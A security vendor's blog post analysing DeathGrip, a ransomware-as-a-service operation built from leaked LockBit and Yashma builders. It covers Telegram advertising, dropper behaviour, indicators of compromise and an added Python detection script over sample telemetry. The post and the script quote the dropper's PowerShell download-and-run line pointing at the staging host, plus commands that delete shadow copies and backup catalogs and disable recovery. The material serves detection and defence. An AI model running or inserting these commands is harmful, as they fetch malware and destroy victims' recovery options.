Effective URL: https://www.sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders/
DEATHGRIP RAAS | SMALL-TIME THREAT ACTORS AIM HIGH WITH LOCKBIT & YASHMA BUILDERS

August 8, 2024
by Jim Walter

The infosec community continues to eye a worrying trend: how the barrier to
entry for extortion-focused cybercriminals is nearly non-existent. With a wide
selection of ransomware builders and resources now readily available, new and
malicious operations are emerging at an alarming rate.

One operation in particular called DeathGrip ransomware made its debut in June
this year. Operating as a Ransomware-as-a-Service (RaaS), DeathGrip offers
would-be threat actors on the darkweb sophisticated ransomware tools, including
LockBit 3.0 and Yashma/Chaos builders. This ease of access allows even those
with minimal technical skills to deploy fully-developed ransomware attacks.

Promoting their services through Telegram and other underground forums,
DeathGrip RaaS has quickly become a notable player in the cybercrime world.
Their payloads, crafted using leaked ransomware builders, are already being
observed in real-world attacks. This blog post explores the rise of this
ransomware outfit and analyzes the threats posed by their use of LockBit and
Yashma/Chaos-based payloads.




RANSOMWARE ACCESSIBILITY | HOW BUILDERS EMPOWER CYBERCRIMINALS

The proliferation of these ransomware builder tools drives the ongoing
commoditization of ransomware across the full spectrum of attacker capability.
DeathGrip is one example; groups such as IkaruzRT and NullBulge are others.
While IkaruzRT and NullBulge are more niche examples, larger attacks have also
been carried out with these same tools, including DragonForce’s use of LockBit
builders. More recently, a Brain Cipher ransomware attack caused a disruption at
the National Data Center in Indonesia; Brain Cipher is also based on the LockBit
builder. In terms of destructive potential, these smaller operations are every
bit as capable as the ‘big game’ operations.


A PEEK INTO DEATHGRIP RANSOMWARE OPERATIONS

DeathGrip ransomware emerged in late June 2024, advertising through Telegram
channels. The first run of advertisements was subsequently echoed across
various channels and forums. The service was initially tagged with the contact
@PayloadDev. Some of the post-infection artifacts also cite an identity, Team
RansomVerse.

Ransomware builders shared across Telegram

Currently, the group does not host a data leak site (DLS) or other central hub
for monetizing victim data. As of this writing, victims are instructed to engage
the attacker via Telegram per the instructions in DeathGrip’s ransom notes.

DeathGrip ransomware 1.0 announcement

As an RaaS model, DeathGrip ransomware offers the following features in their
initial launch:

Encryption and File Handling

 * Utilizing the AES-256 CGM algorithm for file encryption
 * Offering two encryption modes:
   * Encrypting all files
   * Encrypting files with specific extensions
 * Removing backups and restore points to prevent easy recovery

Security Evasion Techniques

 * Implementing UAC bypass to gain elevated privileges
 * Employing anti-virtual environment measures
 * Access to anti-emulator and anti-debugger functionality
 * Detecting and preventing execution in sandboxes, including ANY.RUN
 * Incorporating anti-CIS (Commonwealth of Independent States) measures to avoid
   infecting systems in CIS countries

System Manipulation

 * Disabling specific processes
 * Creating a startup task manager entry for persistence
 * Allowing customization of file properties and icons
 * Capabilities for disabling specified Windows services

DeathGrip ransomware was advertised across multiple Telegram channels including
t[.]me/MalwareWhiteList, t[.]me/TrojanLab, and t[.]me/ransomservice.

DeathGrip ransomware on Trojan Lab (Telegram)

As an aside, it is worth noting that the post in Trojan Lab includes a
VirusTotal (VT) link to an associated Dropper.bat file
(d24fc282fb660945b87e1c41860a031f6e7ec9f6). While threat actors will sometimes
link to more anonymous scan results to increase confidence in their offerings,
it is not common for them to link directly to a VT sample in this way, because
of the lack of anonymity and the high visibility to the security research
community.

The reason is that when a threat actor posts a direct VT link to their product
for advertising purposes, it opens them up to a great deal of scrutiny within
the offensive community. Everything about that sample is visible and can be
reviewed, to the benefit or detriment of the threat actor.

Additionally, it makes the sample and any related metadata available to the
public, so security researchers have direct access to the samples. It is more
common for threat actors to link to, or screenshot, detection results from more
anonymized services that are not attached to a community of security defenders
and vendors (e.g., scanner[.]to).

DeathGrip ransom promoted on malware whitelist (Telegram)


DEATHGRIP SAMPLES IN THE WILD

Initially observed DeathGrip samples are based on the leaked LockBit 3.0
builder. They are distributed as bundled self-extracting .scr files. Upon
execution, these droppers retrieve and execute the LockBit-based ransomware
payloads.

One observed example (2d566a2b94fc8b16b97200392db1bbe714c31289) was deployed
from a bundle hosted at master-repogen.vercel[.]app. The LockBit-based
ransomware displayed the following ransom note on encrypted systems.

DeathGrip ransomware ransom note (LockBit version)

Beyond the group’s modifications to the LockBit ransom note, the payloads are
standard LockBit 3.0 / LockBit Black. The group includes their Telegram channel
details, but leaves the legacy LockBit recovery URLs intact.

Chaos/Yashma versions of DeathGrip ransomware have also been observed. These are
distributed via the same host (master-repogen.vercel[.]app).

DeathGrip ransomware distribution of Yashma builder
Yashma ransomware builder

DeathGrip payloads such as fc9548f91123e05196dad6bcab11d29abd01500c, based on
Yashma/Chaos, have been observed in the wild as well.


EXTRACTING DEATHGRIP PAYLOADS

DeathGrip ransomware payloads, both the LockBit and Chaos/Yashma versions, are
distributed as self-extracting WinRAR bundles. The bundles consist of a dropper
batch file along with a .JPG file which is displayed upon infection via the
DeathGrip logo. The dropper is responsible for retrieving the payloads from the
remote staging server and then executing them.

Bundled DeathGrip ransomware payload (LockBit version)
Extracted DeathGrip Dropper and “death” logo

The included Dropper.bat file retrieves the ransomware payload from
https[:]//master-repogen.vercel[.]app. Basic PowerShell commands are used to
retrieve the payloads. For example:

(powershell -Command "(New-Object System.Net.WebClient).DownloadFile('%url%', '%downloadsFolder%\%filename%')")

With DeathGrip malware payloads, the threat actor alters the file downloaded
from the remote staging server to deliver different payloads. The “server.scr”
example below delivers the group’s LockBit-based payloads. Yashma/Chaos builders
were also observed being pulled from similar droppers with modified Dropper.bat
files (e.g., Yashma/Chaos payloads seen distributed as “tmk.scr”).

DeathGrip ransomware dropper.bat (LockBit version)
DeathGrip ransomware dropper.bat (Yashma/Chaos version)

Upon execution, the ‘death.jpg’ is displayed, whilst the .bat file retrieves and
launches the ransomware payload.

DeathGrip .jpg displayed upon execution

The Chaos/Yashma variations of DeathGrip ransomware write a copy of themselves
to %AppData%\Roaming\Console Window Host.exe. All further malicious behaviors
are initiated from this instance of the payload executable. This behavior is
consistent with other ransomware based on Yashma/Chaos. These payloads require
elevated privileges; if they are not already held, a UAC prompt is presented to
the logged-in user.

DeathGrip ransomware UAC prompt
DeathGrip ransomware processes via deep visibility

Once fully launched, the malware will proceed to encrypt files on disk along
with displaying the ransom note and modifying the desktop wallpaper.

DeathGrip ransomware wallpaper modification

Ransom notes, for these variants, are written to all locations containing
encrypted files. The ransom notes are written as read_it.txt for all observed
DeathGrip ransomware variants.

DeathGrip ransom note (Chaos version)

Ransom amounts vary across samples. However, compared to big game ransomware
operations such as Play, DungHill, and Inc, the ransom demands are very low.
Commonly observed ransom amounts for DeathGrip ransomware are $100.00 USD and
$1000.00 USD – both low amounts when considering today’s ransomware landscape
and recent record-breaking ransoms.

Upon launch of the ransomware payloads, multiple additional system changes are
carried out. The following System Recovery Manipulation (T1490) commands are
observed:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

wbadmin.exe delete catalog -quiet

Next, the following Volume Shadow Copy (VSS) Removal / Manipulation (T1490)
commands are observed:

vssadmin.exe delete shadows /all /quiet

WMIC.exe shadowcopy delete

DeathGrip ransomware (Chaos) process tree

Infected files are finally updated with the .deathgrip or .DeathGrip extension
once encryption is complete.
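As an added example (not SentinelOne's code, nor anything from the dropper or payload), the Python below turns the behaviours described above into detection logic: the PowerShell download cradle from Dropper.bat and the staging host, the Chaos/Yashma self-copy to Console Window Host.exe, the T1490 recovery-inhibition commands, the read_it.txt ransom note and the .deathgrip extension. It runs over constructed process and file telemetry; the event schema (host, ts, type, image, cmdline, path) is an assumption, the sample lines are constructed rather than captured, and the T1105 label on the download cradle is the standard ATT&CK ID, not one cited in this post.

```python
"""Behavioural detection over process/file telemetry for the DeathGrip chain."""
import json
import re
from collections import defaultdict

# Rules: (name, ATT&CK technique or category, event type, regex). The T1490
# commands, ransom note name, file extension, persistence path and staging
# host are taken from the write-up above; T1105 (Ingress Tool Transfer) is the
# standard ATT&CK ID for the download cradle and is not cited in the write-up.
RULES = [
    ("bcdedit_ignoreallfailures", "T1490", "process",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("bcdedit_recoveryenabled_no", "T1490", "process",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I)),
    ("wbadmin_delete_catalog", "T1490", "process",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("vssadmin_delete_shadows", "T1490", "process",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\s+/all", re.I)),
    ("wmic_shadowcopy_delete", "T1490", "process",
     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("powershell_webclient_downloadfile", "T1105", "process",
     re.compile(r"powershell.*New-Object\s+System\.Net\.WebClient\).*\.DownloadFile\(", re.I)),
    ("deathgrip_staging_host", "ioc", "process",          # accepts defanged or live form
     re.compile(r"master-repogen\.vercel(\[\.\]|\.)app", re.I)),
    ("chaos_console_window_host_copy", "persistence", "file",  # self-copy under Roaming
     re.compile(r"\\Roaming\\Console Window Host\.exe$", re.I)),
    ("deathgrip_ransom_note", "impact", "file",
     re.compile(r"\\read_it\.txt$", re.I)),
    ("deathgrip_extension", "impact", "file",
     re.compile(r"\.deathgrip$", re.I)),
]
TECHNIQUE = {name: tech for name, tech, _, _ in RULES}

# Constructed sample telemetry (JSON lines in an assumed schema; not a real
# capture). WS01 shows the full chain, WS02 a lone admin vssadmin run, WS03 noise.
SAMPLE_TELEMETRY = r"""
{"host":"WS01","ts":1000,"type":"process","image":"cmd.exe","cmdline":"cmd.exe /c C:\\Users\\alice\\Desktop\\Dropper.bat"}
{"host":"WS01","ts":1001,"type":"process","image":"powershell.exe","cmdline":"powershell -Command \"(New-Object System.Net.WebClient).DownloadFile('https://master-repogen.vercel[.]app/file/tmk.scr', 'C:\\Users\\alice\\Downloads\\tmk.scr')\""}
{"host":"WS01","ts":1005,"type":"file","image":"tmk.scr","path":"C:\\Users\\alice\\AppData\\Roaming\\Console Window Host.exe"}
{"host":"WS01","ts":1010,"type":"process","image":"bcdedit.exe","cmdline":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"}
{"host":"WS01","ts":1011,"type":"process","image":"bcdedit.exe","cmdline":"bcdedit.exe /set {default} recoveryenabled no"}
{"host":"WS01","ts":1012,"type":"process","image":"wbadmin.exe","cmdline":"wbadmin.exe delete catalog -quiet"}
{"host":"WS01","ts":1013,"type":"process","image":"vssadmin.exe","cmdline":"vssadmin.exe delete shadows /all /quiet"}
{"host":"WS01","ts":1014,"type":"process","image":"WMIC.exe","cmdline":"WMIC.exe shadowcopy delete"}
{"host":"WS01","ts":1020,"type":"file","image":"Console Window Host.exe","path":"C:\\Users\\alice\\Documents\\read_it.txt"}
{"host":"WS01","ts":1021,"type":"file","image":"Console Window Host.exe","path":"C:\\Users\\alice\\Documents\\budget.xlsx.deathgrip"}
{"host":"WS02","ts":2000,"type":"process","image":"vssadmin.exe","cmdline":"vssadmin.exe delete shadows /all /quiet"}
{"host":"WS03","ts":3000,"type":"process","image":"notepad.exe","cmdline":"notepad.exe C:\\notes.txt"}
"""


def parse_events(jsonl):
    """Parse JSON-lines telemetry into dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def match_rules(event):
    """Names of every rule that fires on one event: the command line for
    process events, the target path for file events."""
    subject = event.get("cmdline", "") if event["type"] == "process" else event.get("path", "")
    return [name for name, _, etype, rx in RULES if etype == event["type"] and rx.search(subject)]


def t1490_chain(hits, window):
    """True when two or more distinct T1490 rules fire within `window` seconds.
    A single vssadmin or wbadmin run is routine admin work; the payload above
    issues the whole set back to back."""
    t1490 = sorted((ts, n) for ts, n in hits if TECHNIQUE[n] == "T1490")
    for ts, _ in t1490:
        names = {n for t, n in t1490 if ts <= t <= ts + window}
        if len(names) >= 2:
            return True
    return False


def evaluate(events, window=300):
    """Group rule hits per host and assign a severity per host."""
    per_host = defaultdict(list)
    for ev in events:
        for name in match_rules(ev):
            per_host[ev["host"]].append((ev["ts"], name))
    verdicts = {}
    for host, hits in per_host.items():
        cats = {TECHNIQUE[n] for _, n in hits}
        if "impact" in cats or t1490_chain(hits, window):
            severity = "critical"  # encryption artefacts or recovery-inhibition chain
        elif "ioc" in cats or "persistence" in cats:
            severity = "high"      # known staging host or Chaos/Yashma self-copy
        else:
            severity = "medium"    # a lone suspicious command, needs triage
        verdicts[host] = {"severity": severity, "rules": sorted({n for _, n in hits})}
    return verdicts


if __name__ == "__main__":
    for host, verdict in evaluate(parse_events(SAMPLE_TELEMETRY)).items():
        print(host, verdict["severity"], ", ".join(verdict["rules"]))
```

Feeding real EDR or Sysmon process-creation and file-create events through parse_events only requires mapping their fields onto the assumed schema; the windowing in t1490_chain is what keeps a single administrative shadow-copy cleanup from paging anyone.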


CONCLUSION

As groups like DeathGrip continue to proliferate, the appeal of turn-key
ransomware and extortion-based campaigns grows among the cyber threat
underground. The combination of easy access to sophisticated tools, leaked
builders, and a variety of platforms that support the monetization of stolen
data has made this kind of criminal model highly attractive.

We continue to see these tools becoming commoditized by threat actors.
Hacktivists and niche operators are using them to disrupt the operations of
their targets and spread their causes. Larger operations such as Brain Cipher
and DarkVault have been tied to notable attacks featuring the LockBit builder.
There are analogs with the Babuk and Slam builders, Kryptina RaaS, as well as
the aforementioned Chaos/Yashma builder.

DeathGrip ransomware is just the latest example of a broader trend where
malicious actors often rely on readily available, cost-effective resources
rather than developing bespoke, cutting-edge tools. While the technologies they
are using are not revolutionary by any means, they are effective enough to cause
significant damage, disruption, and profit losses. We expect this trend to
continue with an increasing number of smaller threat operators leveraging these
tools to ‘punch up’ into more significant attack dynamics.

SentinelOne’s Singularity™ Platform is capable of detecting and preventing
malicious activities and payloads associated with DeathGrip ransomware. To learn
more, book a demo or contact us today.


INDICATORS OF COMPROMISE


SHA1

2d566a2b94fc8b16b97200392db1bbe714c31289 DeathGrip (LockBit)
560065e8fbc3eb7743c74d3300d73db16141fd1f DeathGrip (Chaos/Yashma)
96c375b9c57292db73c7ef2f2df16cf7be1604bb DeathGrip (LockBit)
d24fc282fb660945b87e1c41860a031f6e7ec9f6 dropper.bat
fc9548f91123e05196dad6bcab11d29abd01500c DeathGrip (Chaos/Yashma)


NETWORK

https[:]//master-repogen.vercel[.]app/file/server.scr
https[:]//master-repogen.vercel[.]app/file/tmk.scr
